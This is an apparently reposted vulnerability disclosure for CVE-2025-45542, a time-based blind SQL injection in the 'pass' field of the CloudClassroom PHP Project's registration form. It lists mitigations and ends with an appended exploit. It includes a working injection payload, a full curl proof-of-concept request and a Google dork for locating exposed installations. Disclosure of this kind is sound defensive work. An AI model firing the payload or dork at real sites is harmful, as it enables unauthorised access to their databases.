Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Hello Full Disclosure list,

I am sharing details of a newly Hello Full Disclosure list,

I am sharing details of a newly assigned CVE affecting an open-source
educational software project:

------------------------------------------------------------------------
CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP
Project v1.0
------------------------------------------------------------------------

Product: CloudClassroom PHP Project
Vendor: https://github.com/mathurvishal/CloudClassroom-PHP-Project
Affected Version: v1.0
Vulnerability Type: SQL Injection
Attack Type: Remote
CVE ID: CVE-2025-45542
Discoverer: Sanjay Singh

Vulnerability Details:
A time-based blind SQL injection vulnerability exists in the
`registrationform` endpoint of CloudClassroom-PHP-Project v1.0. The `pass`
parameter is not properly sanitized, allowing an unauthenticated remote
attacker to manipulate backend SQL logic and potentially extract sensitive
information.

Proof of Concept:
The vulnerability can be exploited using a POST request with a crafted
payload like:
`'XOR(if(now()=sysdate(),sleep(6),0))XOR'`

Impact:
Successful exploitation allows for:
- Arbitrary SQL execution
- Potential information disclosure
- Authentication bypass under certain conditions

Recommended Mitigations:
- Use prepared statements with parameterized queries
- Sanitize input with `mysqli_real_escape_string()` or similar
- Implement a Web Application Firewall (WAF)
- Enforce least privilege on the application?s DB user

References:
- GitHub: https://github.com/mathurvishal/CloudClassroom-PHP-Project
- Exploit-DB Submission (pending approval)
- GHDB Dork (submitted): `inurl:"CloudClassroom-PHP-Project-master"
intitle:"Cloud Classroom"`

I have also submitted this to Exploit-DB and the Google Hacking Database to
assist defenders and researchers.

Attached is a detailed advisory in plain text format.

Regards,
Sanjay Singh
https://www.linkedin.com/in/sanjay70023

https://gist.github.com/sanjay70023/63e9c32e49a0760eaa6b9e2a8ba8c966


--- packet storm appended exploit below ---

# Exploit Title: CloudClassroom PHP Project v1.0 - Time-Based Blind SQL Injection (pass parameter)
# Google Dork: inurl:CloudClassroom-PHP-Project-master
# Date: 2025-05-30
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://github.com/mathurvishal/CloudClassroom-PHP-Project
# Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project/archive/refs/heads/master.zip
# Version: 1.0
# Tested on: XAMPP on Windows 10 / Ubuntu 22.04
# CVE : CVE-2025-45542

# Description:
# A time-based blind SQL injection vulnerability exists in the pass parameter
# of the registrationform endpoint. An attacker can exploit this issue by sending
# a malicious POST request to delay server response and infer data.

# PoC Request (simulated using curl):

curl -X POST http://localhost/CloudClassroom-PHP-Project-master/registrationform \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&email=This email address is being protected from spambots. You need JavaScript enabled to view it.&faname=test&fname=test&gender=Female&lname=test&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z&phno=94102&sub="

# The server response will be delayed if the SQL condition is true, confirming the injection point.
Social Media Share